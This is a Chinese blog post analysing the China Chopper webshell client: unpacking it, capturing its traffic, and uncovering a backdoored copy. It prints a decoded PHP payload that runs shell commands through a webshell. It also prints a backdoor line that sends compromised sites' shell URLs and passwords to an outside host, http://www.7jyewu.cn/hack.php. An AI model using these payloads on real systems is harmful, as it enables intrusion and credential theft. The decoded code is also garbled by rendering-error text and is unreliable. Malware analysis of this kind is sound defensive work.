全面分析中国菜刀及隐藏后门

0x01:“静态”分析中国菜刀

作为一款黑客神器,怎么可能裸奔呢?
我们通过peid等工具可以看出来加壳了
全面分析中国菜刀及隐藏后门_第1张图片
通过winehx,也可以看到菜刀经过upx加壳处理
全面分析中国菜刀及隐藏后门_第2张图片

我们相应地对它脱壳处理
全面分析中国菜刀及隐藏后门_第3张图片

这时候再用peid查看,可以看到已经没有壳了,并且可以看出是vc++6.0编写
全面分析中国菜刀及隐藏后门_第4张图片

既然已经脱壳了,那我们来把它的可见字符串打印出来看看
全面分析中国菜刀及隐藏后门_第5张图片
由于字符串太多,我们可以有目的性地查找字符串如http
全面分析中国菜刀及隐藏后门_第6张图片
再比如说关键字chopper全面分析中国菜刀及隐藏后门_第7张图片

0x2动态分析中国菜刀

写一个php一句话放在我们网站的根目录下,如1.php,内容为

然后打开wireshark准备监听数据包,同时使用菜刀进行连接

全面分析中国菜刀及隐藏后门_第8张图片全面分析中国菜刀及隐藏后门_第9张图片

监听到的数据包如下:
全面分析中国菜刀及隐藏后门_第10张图片
客户端在80端口上,以HTTP POST方式通讯
我们可以追踪tcp流来查看整个tcp数据交互过程

全面分析中国菜刀及隐藏后门_第11张图片
上面红色部分为攻击机POST提交控制命令的内容,下面蓝色部分为靶机返回结果
我们可以看到一共有z0,z1,z2三个参数,我们分别解码。
解码的顺序依次为url解码,然后再base64解码,得到明文:
可以看到红色部分的代码经过base64以及url的编码,我们解码看看
考虑到环境没有联网,我们可以使用butp的解码模块
全面分析中国菜刀及隐藏后门_第12张图片
全面分析中国菜刀及隐藏后门_第13张图片
明文如下:
z0=@ini_set(“display_errors”,“0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");; p = b a s e 6 4 d e c o d e ( p=base64_decode( p=base64decode(_POST[“z1”]); s = b a s e 6 4 d e c o d e ( s=base64_decode( s=base64decode(_POST[“z2”]); d = d i r n a m e ( d=dirname( d=dirname(_SERVER[“SCRIPT_FILENAME”]); c = s u b s t r ( c=substr( c=substr(d,0,1)=="/"?"-c '{KaTeX parse error: Expected 'EOF', got '}' at position 2: s}̲'":"/c {s}";KaTeX parse error: Expected '}', got 'EOF' at end of input: r="{p} {KaTeX parse error: Expected 'EOF', got '}' at position 2: c}̲";@system(r." 2>&1");;echo("|<-");die();
z1=cmd
z2=cd /d “D:\phpstudy\PHPTutorial\WWW”&whoami&echo [S]&cd&echo [E]

z1的值是cmd,z2的值是cd /d “c:\inetpub\wwwroot\”&whoami&echo [S]&cd&echo [E]。该操作的意思就是执行输入的cmd命令,列出当前用户与当前目录,执行结果如下所示
在这里插入图片描述
我们输入其他的命令的话,当然也是可以通过同样的流程进行分析
以上就是中国菜刀的流量通信的特征

了解了正常的菜刀是如何工作的,接下来我们看看被植入恶意后门的菜刀是怎样的。

0x03分析中国菜刀后门为了与前一个菜刀的分析流程进行区分,我们这一步特地选用了另外一个菜刀,使用另外一个抓包软件进行分析。

我们这次使用的抓包软件为WSockExpert
打开后我们点击左上角的文件夹的图标,选择caidao.exe,点击open即可
全面分析中国菜刀及隐藏后门_第14张图片
接下来连接菜刀
全面分析中国菜刀及隐藏后门_第15张图片
全面分析中国菜刀及隐藏后门_第16张图片

菜刀连接以后我们可以随意操作一下(比如点击、切换文件夹等,以此来产生通信流量方便我们后续的分析)
全面分析中国菜刀及隐藏后门_第17张图片
回到我们的winsock expert
全面分析中国菜刀及隐藏后门_第18张图片
我们将下面的字符串解码
先URL解码
全面分析中国菜刀及隐藏后门_第19张图片
再base64解码
全面分析中国菜刀及隐藏后门_第20张图片
我们知道,在分析前一个菜刀时,一次URL解码,一次base64解码就可以了,但是,在分析这个菜刀的时候我们注意到,还是存在密文。
那么我们接着解码
全面分析中国菜刀及隐藏后门_第21张图片
明文是这样的:
if(KaTeX parse error: Expected '}', got 'EOF' at end of input: …hack.php?Url='._SERVER[‘HTTP_HOST’].KaTeX parse error: Expected 'EOF', got '&' at position 25: …REQUEST_URI'].'&̲Pass='.key(_POST));}

这里的http://www.7jyewu.cn/hack.php就是这个菜刀的后门地址。
HTTP_HOST就是我们拿到shell的网站,REQUEST_URI就是shell的URI,Pass就是我们菜刀连接一句话时的密码
这段代码的大概意思就是,会将我们的拿到shell的网站的地址,密码等都会通过后门传送给这个网站的所有者。

这样,我们就分析出了这个菜刀是存在后门的。

你可能感兴趣的:(全面分析中国菜刀及隐藏后门)